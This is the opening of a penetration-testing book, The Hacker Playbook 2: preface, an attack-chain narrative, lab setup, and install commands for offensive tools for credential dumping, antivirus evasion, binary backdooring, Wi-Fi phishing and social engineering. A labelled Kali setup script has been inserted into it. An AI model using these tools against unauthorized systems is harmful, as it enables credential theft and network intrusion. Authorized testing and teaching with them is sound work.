Preface 


This is the second iteration of The Hacker Playbook (THP). For those that read the first book, this is 
an extension of that book. Below is an overview of all of the new vulnerabilities and attacks that will 
be discussed. In addition to the new content, attacks and techniques from the first book, which are still 
relevant today, are included to eliminate the need to refer back to the first book. So, what’s new? 
Some of the updated attacks from the last year and a half include: 

• Heartbleed 

• ShellShock 

• Kerberos issues (Golden Ticket/Skeleton Key) 

• PTH Postgres 

• New Spear Phishing 

• Better/Cheaper Dropboxes 

• Faster/Smarter Password Cracking 

• New WIFI attacks 

• Tons of PowerShell scripts 

• Privilege Escalation Attacks 

• Mass network compromises 

• Moving laterally smarter 

• Burp Modules 

• Printer Exploits 

• Backdoor Factory 

• ZAP Proxy 

• Sticky Keys 

• NoSQL Injection 

• Commercial Tools (Cobalt Strike, Canvas, Core Impact) 

• Lab sections 

• And so much more 


In addition to describing the attacks that have changed in the last couple years, I have attempted to 
incorporate all of the comments and recommendations received from readers of the first book into this 
second book. A more in-depth look into how to set up a lab environment in which to test your attacks 
is also given, along with the newest tips and tricks of penetration testing. Lastly, I tried to make this 
version easier to follow since many schools have incorporated my book into their curricula. 
Whenever possible, I have added lab sections that help provide a way to test a vulnerability or 
exploit. 


What’s not different? One of my goals from the first book was to make this as “real world” as 
possible. I really tried to stay away from theoretical attacks and focused on what I have seen from 
personal experience and what actually worked. The second goal was to strengthen your core 
understanding as a penetration tester. In other words, I wanted to encourage you to use different 
methods to boost your value to your current or future company or client. Just running a vulnerability 
scanner and submitting that as your report provides no real benefit to a company. Also, penetration 
tests with an extremely limited scope will give a false sense of security. To THP1 readers, rest 
assured that although you may find some familiar information, there is a great deal of new information 
in THP2, which has double the content compared to its predecessor. Additionally, by popular 
demand, I have created a slew of scripts and tools to help you in your hacking adventure. This was 
probably one of the top requests by readers, so I have included a ton of scripts located in my Github 
(https://github.com/cheetz) and tried to make it easier to follow. 


For those who did not read the first book, you might be wondering what experience I have as a 
penetration tester. My background comes from eight years of penetration testing for major financial 
institutions, large utility companies, Fortune 500 entertainment companies, and government 
organizations. I have also spent years teaching offensive network security, spoken at 
Toorcon/Derbycon/BayThreat, been referenced in many security publications, and currently run a 
security community of over 300 members in Southern California. My hope is that you will be able to 
take what I have learned and incorporate it into your own security lifestyle. 


From a technical standpoint, many tools and attacks have changed in the past couple years. With 
attacks like pass-the-hash, and with Group Policy Preferences getting patched, the process and 
methods of attackers have changed. 

One important note is that I am using both commercial tools and open source. For every commercial 
tool, I try to give an open source counterpart. I occasionally run into some pentesters that say they 
only use open source tools. As a penetration tester, I find this a hard statement to take. If you are 
supposed to emulate a “real world” attack, and the “bad guys” do not have these restrictions, then you 
need to use any tool that works to get the job done. 


Who is this book intended for? You need to have some experience with Microsoft Active Directory, a 
solid understanding of Linux, some networking background, some coding experience (Bash, Python, 
Perl, Ruby, PHP, C, or anything along that line), and using security tools like vulnerability scanners 
and exploit tools (i.e. Metasploit). If you don’t have the background, but are interested in getting into 
security, I would suggest making sure you have the basics down. You can’t just jump into security 
without the basic knowledge of how things work first. 


This book is not just for those looking to get into or who currently are in the offensive fields. This 
book provides valuable information and insight for incident responders as well, as they need to know 
how attackers think and what methods they use. 


Lastly, I want to discuss a bit about the difference between researchers and penetration testers. Many 
times, these two professions blend together, as both need to be knowledgeable in both areas. 
However, in this book, I separate the two areas slightly and focus on penetration testing. To clarify, in 
this book, a researcher is one who focuses on a single or limited scope and spends more time 
reversing the application/protocol/OS. Their goal is to discover an unknown exploit for that 
particular vulnerability. On the other hand (and remember this is a generalization), a penetration 
tester takes what is already known to compromise systems and applications. There will always be 
some overlap: a pentester will still fuzz vulnerabilities (for example, web parameters) and find zero- 
days, but he/she might not spend as much time finding all the issues as a researcher might. 


Last Notes and Disclaimer 


This book is not going to turn you into some sort of super hacker. It takes a lot of practice, research, 
and a love for the game. This book will hopefully make you think outside the box, become more 
creative, and help grow your understanding of flaws that occur in systems. 


Just remember, ONLY test systems on which you have written permission. Just Google the term 
“hacker jailed” and you will see plenty of different examples where young teens have been sentenced 
to years in prison for what they thought was a “fun time.” There are many free platforms where legal 
hacking is allowed and will help you further educate yourself. 



Introduction 


You have been hired as a penetration tester for a large industrial company called Secure Universal 
Cyber Kittens, Inc. or SUCK, for short. They are developing future weapons to be used by the highest 
bidder and you have been given the license to kill... okay, maybe not kill, but the license to hack. This 
authorization gives you full approval to use any tactic in your arsenal to try to break into and steal the 
company’s trade secrets. 

As you pack your laptop, drop boxes, rubber duckies, Proxmarks, and cables, you almost forget the 
most important thing...The Hacker Playbook 2 (THP). You know that THP will help get you out of 
some of the stickiest situations. Your mind begins hazing back to your last engagement... 


After cloning some badges and deploying your drop box on the network, you run out of the office, 
barely sneaking past the security guards. Your drop box connects back to your SSH server and now 
you are on their network. You want to stay pretty quiet on the network and not trigger any IDS 
signatures. What do you look for? You flip to the Before the Snap chapter and remember printers! 
You probe around for a multifunction printer and see that it is configured with default passwords. 
Great! You re-configure LDAP on the printer, set up your netcat listener, and obtain Active Directory 
credentials. Since you don’t know what permissions these credentials have, you try to psexec to a 
Windows machine with a custom SMBexec payload. The credentials work and you are now a regular 
user. After a couple tricks with PowerTools in the Lateral Pass section, you move to local admin and 
pull passwords from memory with Mimikatz. Phew... you sigh... this is too easy. After pulling 
passwords for a few accounts, you find where the domain admins (DA) are and connect to their boxes 
to pull passwords again. With domain admin creds, it is pretty straightforward to dump the Domain 
controller (DC) with psexec_ntdsgrab and then clear your tracks... 


Glad you didn’t forget your copy of THP! 


Standards 


Before we can dive into THP, we need to understand some of the basics and standards used for 
penetration testing. This will be the foundation for recon, finding and exploiting vulnerabilities, and 
reporting. There really is no right way to perform an engagement, but you will need to at least cover 
the basics. 


The Penetration Testing Execution Standard 
(PTES - http://www.pentest-standard.org/index.php) 


PTES is the current standard for performing penetration tests. These are referenced regularly and are 
the core elements in what goes on in an engagement. I highly recommend that you go through the entire 
PTES technical guideline as it is full of detailed information. The standard accepted model consists 
of seven main sections: 

1. Pre-engagement Interactions 

2. Intelligence Gathering 

3. Threat Modeling 

4. Vulnerability Analysis 

5. Exploitation 

6. Post Exploitation 

7. Reporting 


One thing I encourage you to do is to be creative and find what works for you. For me, although the 
PTES framework is a great model for performing penetration tests, I like taking penetration tests and 
tweaking the standard model. From experience, the standard I would typically use would look 
something like the following: 

1. Intelligence Gathering 

2. Initial Foothold 

3. Local/Network Enumeration 

4. Local Privilege Escalation 

5. Persistence 

6. Lateral Movement 

7. Domain Privilege Escalation 

8. Dumping Hashes 

9. Data Identification/Exfiltration 

10. Reporting 


This breakdown shows what I would perform and focus on during a penetration test. After the initial 
foothold via social engineering, the focus is to acquire a privileged account. To get there, you have to 
enumerate the system/network and look for misconfigurations or local vulnerabilities. We also need 
to implement persistence, just in case we end up losing our shells. Once at a system or elevated 
account, we need to see if we can acquire a domain-privileged account. To do this, we need to 
compromise other boxes to eventually get to a domain admin (DA) account. At a domain controller 
(DC), the best part of the test is to dump the domain hashes and take a quick break for a happy dance. 
This test should not end here. Where customer value really comes into play is going after sensitive 
data, especially personally identified information (PII), intellectual property (IP), or other 
information requested by the client. Lastly, since we all know that reporting pays the bills, having a 
good standard template and valuable data will set you apart from the competition. 


Of course, this was all a very quick and high-level example of what can occur during an assessment. 
To guide you through this process, I have tried to develop a format to help you on your path. The 
Hacker Playbook is set up with 11 different sections, laid out as a football playbook. But, do not 
worry, you don’t necessarily need to know the football terms in detail to follow along. Here is the 
breakdown: 



• Pregame: This is all about how to set up your lab, attacking machines, and the tools 
we will use throughout the book. 

• Before the Snap: Before you can run any plays, you need to scan your environment 
and understand what you are up against. We will dive into discovery and smart 
scanning. 

• The Drive: Take the vulnerabilities which were identified from Before the Snap 
and start exploiting those systems. This is where we get our hands a little dirty and 
start exploiting boxes. 

• The Throw: Sometimes you need to get creative and look for the open target. We 
will take a look at how to find and exploit manual web application findings. 

• The Lateral Pass: After you have compromised a system, we will discuss ways to 
move laterally through the network. 

• The Screen: A play typically used to trick the enemy. This chapter will explain 
social engineering tactics. 

• The Onside Kick: A deliberately short kick that requires close distance. Here, I will 
describe attacks that require physical access. 

• The Quarterback Sneak: When you only need a couple of yards, a quarterback sneak 
is perfect. Sometimes you will get stuck with antivirus (AV); this chapter describes 
how to get over those small hurdles by evading AV. 

• Special Teams: Cracking passwords, exploits, NetHunter and some tricks. 

• Two-Minute Drill: You have only two minutes on the clock and you need to go from 
no access to full domain admin. 

• Post-Game Analysis: Reporting your findings. 


Updates 


As we all know, security changes quickly and things break all the time. I try to keep up with all of the 
changes and any requests you might have. You can find updates here: 

Subscribe for Book Updates: 
http://thehackerplaybook.com/subscribe 

Twitter: @HackerPlaybook 
URL: http://TheHackerPlaybook.com 
Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 





Pregame - The Setup 


Before we can start attacking Secure Universal Cyber Kittens, Inc. (SUCK), we need to build our 
testing lab to test our attacks, develop our attacking machines, and understand how our exploits work. 
Practice and testing are invaluable when it comes to running a full scale attack. You don’t want to be 
the average Joe on a test using untested exploits which inadvertently takes down a critical system, 
getting you identified and tossed out of the company. 


Building A Lab 


It might be hard to build a full lab with all the applications, operating systems, and network 
appliances, but you need to make sure you have the core components. These include basic Linux 
servers and Windows systems. 

Since Microsoft Windows operating systems aren’t free, you may have to purchase some software. If 
you are a student, you can generally get free software through your school. You can also check 
Microsoft DreamSpark (https://www.dreamspark.com/) to see if you qualify. I think with a default 
.edu email address you can get Windows 2012 and other software for free. 


Building Out A Domain 


Practicing on a Microsoft Active Directory (AD) environment is good; however, one of the best ways 
to learn is to build one yourself. Knowing how and why things work on an AD environment will help 
you later on in life. I have put together condensed step-by-step instructions on how to set up an AD 
domain controller that should get you up and running. For those who have never built a DC and client 
before, I highly recommend you do this first. Before you can really understand what you are attacking, 
you need to understand how it works. 

In the example provided below, I will install a Windows Domain Environment using Windows 2012 
R2, Windows 8 and Windows 7. In this book, I wanted to focus on the newer operating systems. 
However, if you are looking to test older exploits, you may want to consider installing Windows XP 
SP2. Check out my Active Directory installation guide here: 

http://www.thehackerplaybook.com/Windows_Domain.htm 


Building Out Additional Servers 

Below are the vulnerable virtual machines I recommend. Many of the labs in this book will use these 
two frameworks for testing. For your own practice, you should look at the other test servers 
mentioned at the end of this book. 

Metasploitable2 

This is a great vulnerable Ubuntu Linux virtual machine that intentionally contains common 
vulnerabilities. This is great for testing security tools, such as Metasploit, and demonstrating 
common attacks. It is relatively easy to set up as you just need to download the virtual machine (VM) 
and boot it in a Virtual Platform. 

• http://sourceforge.net/projects/metasploitable/files/Metasp 

OWASPBWA (OWASP Broken Web Applications Project) 

While Metasploitable2 focuses on services, OWASPBWA is a great collection of vulnerable web 
applications. This is one of the most complete vulnerable web application collections in a single VM. 
This VM will be used for many of the web examples throughout the book. As with Metasploitable2, 
just download the vulnerable VM and boot it up. 

• http://sourceforge.net/projects/owaspbwa/files/ 


Practice 


Penetration testing is like any other profession and needs to be second nature. Every test is 
completely different and you need to be able to adapt with the changing environment. Without 
adequate practice, trying multiple different tools, and exploiting systems using different payloads, you 
won’t be able to adapt if you ever run into a brick wall. 


Building Your Penetration Testing Box 


In The Hacker Playbook One, I received some comments on why I have you build and install 
the tools instead of creating one script to automate it all. The main reason I have my readers manually 
go through these steps is because these are extremely important tools and this will help you remember 
what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well- 
organized, but if you don’t know the tool is installed or you haven’t played around with the individual 
attacks, then it won’t really be helpful in that dire need situation. 






Setting Up A Penetration Testing Box 


If you set up your box from the first book, you can breeze over this section. As you know, I always 
like bringing two different laptops to an engagement. The first is a Windows box and the second is 
either an OS X or Linux host. The reason I bring two laptops is because I have been on penetration 
tests where, on very specific networks, the OS X host would not connect to the network. Instead of 
spending hours trying to figure out why, I just started all of my attacks and scanning from my 
Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times 
having two laptops has saved me. 

It doesn’t matter if you run Windows, OS X, or some Linux flavor on your base system, but there are a 
few musts. First, you need to install a Virtual Machine (VM) platform. You can use VirtualBox 
(https://www.virtualbox.org) or VMware Player (https://my.vmware.com/web/vmware/downloads) 
or any others of your choice. Both are free on Windows, while on OS X only VirtualBox is free. I 
would highly recommend getting the commercial versions for your VM platform as they have a wealth 
of extra features, such as encryption, snapshots, and much better VM management. 


Since we are going to install most of our tools on our VMs, the most important step is to keep your 
base system clean. Try not to even browse personal sites on the base image. This way, your base 
system is always clean and you won’t ever bring malware onto a client site (I have seen this many 
times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot 
the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is 
revert back to the baseline image, patch and update tools, and add any additional tools I need. Trust 
me, this tactic is a lifesaver. I can't count the number of past assessments where I spent way too much 
time setting up a tool that should have already been installed. 


Hardware 


Penetration Testing Laptop 

The basic penetration testing laptop requirements haven’t changed much from the previous book. 

Basic recommendations: 

• Laptop with at least 8GB of RAM 

• 500GB hard drive (solid state is highly recommended) 

• Intel Quad Core i7 Processor 


Password Cracking Desktop 

This is completely optional, but with the number of tests where I have compromised hashes, faster 
password cracking equipment was required. Although you could purchase some crazy rig with 8 
GPUs that runs on a Celeron processor, I have built a multi-purpose box with plenty of space and 
amazing password cracking power. Later in the book, I will go over the actual specs and tools I built 
out for password cracking and the reasons why I went this route. 


Password Cracking/Multi-purpose Hacking Box 


• Case: CORSAIR Vengeance C70 

• Video Card: SAPPHIRE 100360SR Radeon R9 295x2 8GB GDDR5 

• Hard Drive: SAMSUNG 840 EVO MZ-7TE500BW 2.5" 500GB SATA III TLC 
Internal SSD 

• Power Supply: SILVERSTONE ST 1500 1500W ATX 

• RAM: CORSAIR Vengeance Pro 16GB (2 x 8GB) 240-Pin DDR3 SDRAM DDR3 
1600 

• CPU: Intel Core i7 4790K 4.0GHz 

• Motherboard: ASUS MAXIMUS VII FORMULA 

• CPU Cooler: Cooler Master Hyper 212 EV 

This is definitely overkill for just password cracking, since the only thing that really matters are the 
GPUs; but, again, I still wanted to use this as an additional system in my arsenal. 


Open Source Versus Commercial Software 


In this book, I thought it would be beneficial to include a comparison of open source and commercial 
software. Although not everyone has the funds to purchase commercial software, it is very important 
to know what is available and what an attacker might use. Both as a defender and someone who runs 
offensive plays, having the right tools can definitely make the difference. In this book, I will show you 
several different commercial software tools that I find very useful, which can assist in various types 
of offensive situations. With every commercial software, I will try to provide an open source 
companion, but it may not always be available. 

Commercial Software in The Hacker Playbook 2 

• Burp Suite Pro 

• Canvas 

• Cobalt Strike 

• Core Impact 

• Nessus 

• Nexpose 


Kali Linux 

(https://www.kali.org/) 

For those who have never used Kali Linux, it is often seen as the standard in offensive penetration 
testing. This Debian-based Linux distro contains a wealth of different security tools all preconfigured 
into a single framework. This is a great starting point for your offensive security platform and the 
book mainly builds off of this Linux distribution. I highly recommend that you download the virtual 
machine and use this for your testing. 


Back Box 

(http://www.backbox.org) 

Although Kali Linux is seen as the standard, it is best to not ever rely on a single tool/OS/process— 
this will be a constant theme throughout the book. The developers could stop supporting a certain tool 
or, even worse, you begin to experience tunnel vision and rely on old methods. The guys over at Back 
Box are doing great work building and supporting another security platform. The main differences I 
can see are that Back Box is based on Ubuntu and, more importantly, comes with default user rights 
management (instead of everyone running as root in Kali Linux). Some people are more comfortable 
with Ubuntu and I have gotten into situations where specific tools are developed for and run more 
stably on Ubuntu versus Kali. Again, it should be just another tool available at your reach and it is 
good to know what is out there. 


Setting Up Your Boxes 


There are many tools that are not included or that need to be modified from the stock tool set in any of 
the security distributions (distro). I like to put them in a directory where I know where they exist and 
can be used easily. Here are the tools that you will need to install. 

Recon/Scanning Tools 

• Discover 

• EyeWitness 

• HTTP ScreenShot 

• WMAP 

• SpiderFoot 

• Masscan 

• Gitrob 

• CMSmap 

• Recon-ng 

• SPARTA 

• WPScan 

• Password Lists 

Exploitation 

• Burp Suite Pro 

• ZAP Proxy Pro 

• NoSQLMap 

• SQLMap 




• SQLNinja 

• BeEF Exploitation Framework 

• Responder 

• Printer Exploits 

• Veil 

• WIFIPhisher 

• Wifite 

• SET 


Post Exploitation 

• Hacker Playbook 2 - Custom Scripts 

• SMBexec 

• Veil 

• WCE 

• Mimikatz 

• PowerSploit 

• Nishang 

• The Backdoor Factory 

• DSHashes 

• Net-Creds 


Setting Up Kali Linux 


There are many different ways you can set up your attacker host, but I want you to be able to mimic 
all of the examples in this book. Before going on, you should try to configure your host with the 
settings below. Remember that tools do periodically change and that you might need to make small 
tweaks to these settings or configurations. (Don’t forget to check the updates page at 
http://www.thehackerplaybook.com). For those users that have only purchased the physical book, I 
have copied the whole settings and software section to my Github 
(http://www.github.com/cheetz/thp2). This should make copying and pasting much easier, so you 
don’t have to type each command in by hand. 


Since this book is based off of the Kali Linux platform, you can download the Kali Linux distro from: 
http://www.kali.org/downloads/. I highly recommend you download the VMware image 
(https://www.offensive-security.com/kali-linux-vmware-arm-image-download/) and download 
VMware Player/VirtualBox. Remember that it will be a gz-compressed and tar archived file, so make 
sure to extract it first and load the vmx file. 


Once Your Kali VM is Up and Running 

• Log in with the username root and the default password toor 

• Open a terminal 

• Change the password 

o passwd 

• Update the image 

o apt-get update 
o apt-get dist-upgrade 

• Setup Metasploit database 

o service postgresql start 

• Make postgresql database start on boot 

o update-rc.d postgresql enable 

• Start and stop the Metasploit service (this will setup the database.yml file for you) 

o service metasploit start 
o service metasploit stop 

• Install gedit 

o apt-get install gedit 

• Change the hostname - Many network admins look for systems named Kali in logs 
like DHCP. It is best to follow the naming standard used by the company you are 
testing 

o gedit /etc/hostname 

■ Change the hostname (replace kali) and save 
o gedit /etc/hosts 

■ Change the hostname (replace kali) and save 

o reboot 

• *Optional for Metasploit - Enable Logging 

o I list this as optional since logs get pretty big, but you have the ability 
to log every command and result from Metasploit’s Command Line 
Interface (CLI). This becomes very useful for bulk attack/queries or if 
your client requires these logs. *If this is a fresh image, type 
msfconsole first and exit before configuring logging to create the .msf4 
folder. 

o From a command prompt, type: 

■ echo "spool /root/msfconsole.log" > /root/.msf4/msfconsole.rc 

o Logs will be stored at /root/msfconsole.log 
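The post-boot steps above, collected into one re-runnable script as an added example (this is not code from the book or from its Github). The function names, the optional file-path parameters and the sample hostname are my own assumptions; the commands are the ones in the list above. Only the hostname edit and the Metasploit logging setup can be exercised without a real Kali VM, so those two are written as functions that take the files they edit, with defaults pointing at the real locations:

```bash
#!/bin/bash
# Added example (not from the book): the "Once Your Kali VM is Up and Running"
# steps above as one re-runnable script. The optional path parameters on the two
# functions exist only so they can be exercised on copies of the real files;
# the defaults are the real locations on a Kali VM. Run as root.
set -eu

# Replace the old hostname (default: kali) in /etc/hostname and /etc/hosts with
# $1. The hosts file is edited with a whole-word match so that names that merely
# contain "kali" (e.g. "kali-old") are left alone. $1 must be a plain hostname
# (letters, digits, hyphens); it is spliced into the sed expression unescaped.
set_hostname() {
    new="$1"
    old="${2:-kali}"
    hostname_file="${3:-/etc/hostname}"
    hosts_file="${4:-/etc/hosts}"
    printf '%s\n' "$new" > "$hostname_file"
    sed -E "s/(^|[^[:alnum:]_.-])${old}([^[:alnum:]_.-]|$)/\1${new}\2/g" \
        "$hosts_file" > "$hosts_file.tmp" && mv "$hosts_file.tmp" "$hosts_file"
}

# Turn on Metasploit console logging the way the book does: msfconsole.rc is
# executed at every msfconsole start and "spool" copies all console input and
# output to the given file. The line is added only once, so the script can be
# re-run after each snapshot revert without duplicating it.
enable_msf_logging() {
    msf4_dir="${1:-/root/.msf4}"
    logfile="${2:-/root/msfconsole.log}"
    rc="$msf4_dir/msfconsole.rc"
    mkdir -p "$msf4_dir"     # the book creates this by starting msfconsole once
    grep -qxF "spool $logfile" "$rc" 2>/dev/null \
        || printf 'spool %s\n' "$logfile" >> "$rc"
    cat "$rc"
}

# The steps that need the real system: update, Metasploit database, gedit.
main() {
    apt-get update
    apt-get dist-upgrade -y
    apt-get install -y gedit
    service postgresql start
    update-rc.d postgresql enable
    service metasploit start     # first start writes database.yml
    service metasploit stop
    set_hostname "$1"
    enable_msf_logging
    echo "Done. Run 'passwd' to change the root password, then reboot."
}

# Only act when given a hostname and running as root; sourcing the file for
# its functions does nothing. Usage: ./kali-setup.sh WS-CORP-042
if [ -n "${1:-}" ] && [ "$(id -u)" = 0 ]; then
    main "$1"
fi
```

Pick the hostname argument to match the naming standard of the network you are testing, as the list above advises; the whole-word match in `set_hostname` is there so that a second run with a different name does not corrupt entries that merely contain the old one.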


Tool Installation 

The Backdoor Factory: 

• Patch PE, ELF, Mach-O binaries with shellcode. 

• git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory 

• cd /opt/the-backdoor-factory 

• ./install.sh 


HTTP ScreenShot 

• HTTP Screenshot is a tool for grabbing screenshots and HTML of large numbers of 
websites. 

• pip install selenium 

• git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot 

• cd /opt/httpscreenshot 

• chmod +x install-dependencies.sh && ./install-dependencies.sh 

• HTTPScreenShot only works if you are running on a 64-bit Kali by default. If you 
are running 32-bit PAE, install i686 phantomjs as follows: 

o wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2 

o bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2 

o tar xvf phantomjs-1.9.8-linux-i686.tar 

o cp phantomjs-1.9.8-linux-i686/bin/phantomjs /usr/bin/ 


SMBExec 

• A rapid psexec style attack with samba tools. 

• git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec 

• cd /opt/smbexec && ./install.sh 

• Select 1 - Debian/Ubuntu and derivatives 

• Select all defaults 

• ./install.sh 

• Select 4 to compile smbexec binaries 

• After compilation, select 5 to exit 


Masscan 

• This is the fastest Internet port scanner. It can scan the entire Internet in under six 
minutes. 

• apt-get install git gcc make libpcap-dev 

• git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan 

• cd /opt/masscan 

• make 

• make install 


Gitrob 

• Reconnaissance tool for GitHub organizations 

• git clone https://github.com/michenriksen/gitrob.git /opt/gitrob 

• gem install bundler 

• service postgresql start 

• su postgres 

• createuser -s gitrob --pwprompt 

• createdb -O gitrob gitrob 

• exit 

• cd /opt/gitrob/bin 

• gem install gitrob 


CMSmap 

• CMSmap is a python open source CMS (Content Management System) scanner that 
automates the process of detecting security flaws 

• git clone https://github.com/Dionach/CMSmap /opt/CMSmap 

WPScan 

• WordPress vulnerability scanner and brute-force tool 

• git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan 

• cd /opt/wpscan && ./wpscan.rb --update 

Eyewitness 

• EyeWitness is designed to take screenshots of websites, provide some server 
header info, and identify default credentials if possible. 

• git clone https://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness 

Printer Exploits 

• Contains a number of commonly found printer exploits 

• git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit 

SQLMap 

• SQL Injection tool 

• git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap 

Recon-ng 

• A full-featured web reconnaissance framework written in Python 

• git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng 


Discover Scripts 

• Custom bash scripts used to automate various pentesting tasks. 

• git clone https://github.com/leebaird/discover.git /opt/discover 

• cd /opt/discover && ./setup.sh 

BeEF Exploitation Framework 

• A cross-site scripting attack framework 

• cd /opt/ 

• wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef 

• chmod +x install-beef 



• ./install-beef 


Responder 

• An LLMNR, NBT-NS and MDNS poisoner, with built-in 
HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting 
NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP 
authentication. Responder will be used to gain NTLM challenge/response hashes 

• git clone https://github.com/SpiderLabs/Responder.git /opt/Responder 

The Hacker Playbook 2 - Custom Scripts 

• A number of custom scripts written by myself for The Hacker Playbook 2. 

• git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P 

• git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One 

• git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup 

• git clone https://github.com/cheetz/icmpshock /opt/icmpshock 

• git clone https://github.com/cheetz/brutescrape /opt/brutescrape 

• git clone https://www.github.com/cheetz/reddit_xss /opt/reddit_xss 

The Hacker Playbook 2 - Forked Versions 

• Forked versions of PowerSploit and Powertools used in the book. Make sure you 
clone your own repositories from the original sources. 

• git clone https://github.com/cheetz/PowerSploit /opt/HP_PowerSploit 

• git clone https://github.com/cheetz/PowerTools /opt/HP_PowerTools 

• git clone https://github.com/cheetz/nishang /opt/nishang 

DSHashes: 

• Extracts user hashes in a user-friendly format for NTDSXtract 

• wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O /opt/NTDSXtract/dshashes.py 

SPARTA: 

• A python GUI application which simplifies network infrastructure penetration 
testing by aiding the penetration tester in the scanning and enumeration phase. 

• git clone https://github.com/secforce/sparta.git /opt/sparta 

• apt-get install python-elixir 

• apt-get install ldap-utils rwho rsh-client x11-apps finger 

NoSQLMap 

• An automated pentesting toolset for MongoDB database servers and web 
applications. 

• git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap 



Spiderfoot 


• Open Source Footprinting Tool 

• mkdir /opt/spiderfoot/ && cd /opt/spiderfoot 

• wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz/download 

• tar xzvf download 

• pip install lxml 

• pip install netaddr 

• pip install M2Crypto 

• pip install cherrypy 

• pip install mako 

WCE 

• Windows Credential Editor (WCE) is used to pull passwords from memory 

• Download from: http://www.ampliasecurity.com/research/windows-credentials-editor/ 
and save to /opt/. For example: 

o wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip 

o mkdir /opt/wce && unzip wce_v1* -d /opt/wce && rm wce_v1*.zip 

Mimikatz 

• Used for pulling cleartext passwords from memory, Golden Ticket, skeleton key and 
more 

• Grab the newest release from https://github.com/gentilkiwi/mimikatz/releases/latest 

o cd /opt/ && wget http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 

o unzip -d ./mimikatz mimikatz_trunk.zip 

SET 

• Social Engineering Toolkit (SET) will be used for the social engineering campaigns 

• git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/ 

• cd /opt/set && ./setup.py install 

PowerSploit (PowerShell) 

• PowerShell scripts for post exploitation 

• git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit 

• cd /opt/PowerSploit && wget 
https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && 
wget 
https://raw.githubusercontent.com/darkoperator/powershellscripts/master/psencodei 






Nishang (PowerShell) 

• Collection of PowerShell scripts for exploitation and post exploitation 

• git clone https://github.com/samratashok/nishang /opt/nishang 


Veil-Framework 

• A red team toolkit focused on evading detection. It currently contains Veil-Evasion 
for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and 
Veil-PowerView for gaining situational awareness on Windows domains. Veil will be 
used to create a Python-based Meterpreter executable. 

• git clone https://github.com/Veil-Framework/Veil /opt/Veil 

• cd /opt/Veil/ && ./Install.sh -c 


Burp Suite Pro 

• Web Penetration Testing Tool 

• Download: http://portswigger.net/burp/proxy.html . I would highly recommend that 
you buy the professional version. It is well worth the $299 price tag. 

ZAP Proxy Pro 

• OWASP ZAP: An easy-to-use integrated penetration testing tool for discovering 
vulnerabilities in web applications. 

• Download from: https://code.google.com/p/zaproxy/wiki/Downloads?tm=2 

• *Included by default in Kali Linux (owasp-zap) 

Fuzzing Lists (SecLists) 

• These are wordlists (usernames, passwords, directories, fuzzing payloads) to load into Burp Intruder to fuzz parameters 

• git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists 


Password Lists 

• For the different password lists, see the section: Special Teams - Cracking, 
Exploits, and Tricks 

Net-Creds Network Parsing 

• Parse PCAP files for username/passwords 

• git clone https://github.com/DanMcInerney/net-creds.git /opt/net-creds 

Installing Firefox Add-ons 

• Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web- 
developer/ 

• Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 

• Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 



• User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent- 
switcher/ 


Wifite 

• Attacks against WiFi networks 

• git clone https://github.com/derv82/wifite /opt/wifite 

WIFIPhisher 

• Automated phishing attacks against WiFi networks 

• git clone https://github.com/sophron/wifiphisher.git /opt/wifiphisher 

Phishing (Optional): 

• Phishing-Frenzy 

o git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy 

• Custom List of Extras 

o git clone https://github.com/macubergeek/gitlist.git /opt/gitlist 

*Remember to check http://thehackerplaybook.com/updates/ for any updates. 


Windows VM 


I highly recommend you also configure a Windows 7/8 Virtual Machine. This is because I have been 
on many tests where an application will require Internet Explorer or a tool like Cain and Abel, which 
will only work on one operating system. Remember, all of the PowerShell attacks will require you to 
run the commands on your Windows hosts. The point is to always be prepared because you will save 
yourself a lot of time and trouble having multiple operating systems available. 


High level tools list addition to Windows: 

HxD (Hex Editor) 

Evade (Used for AV Evasion) 

Hyperion (Used for AV Evasion) 

Metasploit 

Nexpose/Nessus 

Nmap 

oclHashcat 

Cain and Abel 

Burp Suite Pro 

Nishang 

PowerSploit 

Firefox (Add-ons) 

o Web Developer Add-on 
o Tamper Data 
o Foxy Proxy 
o User Agent Switcher 

Setting Up Windows 

Setting up a Windows common testing platform should help complement your Kali Linux host. 
Remember to change your host names, disable NetBIOS if you don't need it, and harden these boxes as 
much as possible. The last thing you want is to get owned during an assessment. 


There isn’t anything special that I setup on Windows, but usually I will install the following. 


• HxD http://mh-nexus.de/en/hxd/ 

• Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont 

